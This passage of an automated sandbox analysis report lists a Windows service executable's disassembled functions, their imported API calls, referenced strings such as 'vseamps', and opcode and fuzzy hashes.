RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/remove, xrefs: 000000014000157E
vseamps, xrefs: 0000000140001538
/service, xrefs: 000000014000153F

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetActiveWindow, xrefs: 000000014000F075
USER32.DLL, xrefs: 000000014000F03B
GetLastActivePopup, xrefs: 000000014000F094
MessageBoxA, xrefs: 000000014000F054
GetProcessWindowStation, xrefs: 000000014000F10D
GetUserObjectInformationA, xrefs: 000000014000F0E9

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

<program name unknown>, xrefs: 00000001400093D9
Runtime Error!Program: , xrefs: 000000014000938D
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
..., xrefs: 0000000140009431

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE1A512630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE1A51264C
RtlCaptureContext.KERNEL32 ref: 00007FFE1A512679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A512693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A5126D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A512728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A512745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A512750

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 0df473ea65eac9d8e5cebb56309f06a445dff3540951c508f90c8b71de79c105
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: FB310976709A8186EB608FA1E8407FE7366FB85B94F44407BDA4E47AA4EF38D548C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE1A5176E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE1A517759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A517771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A5177AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A5177E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A5177EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A5177FA

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 7f00baacd57c16f140912a2b6c9d89bdfa8e4cc5571eb5e97a600a5602932cdc
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: A3317336708F8195D760CB65E8406BE33A1FB85BA4F5001B7EA8D43B65EF38C145CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE1A520248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE1A520497
RaiseException.KERNEL32 ref: 00007FFE1A5204A8

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 1b2b05230377b3175670e92c5f414f6eb15caa164b20ce4f2f35e47aa6c98fab
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 4BB12873605B89CBEB15CF6AC48636C37A2F745F68F1489A2DA5D837A4CB39D851C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
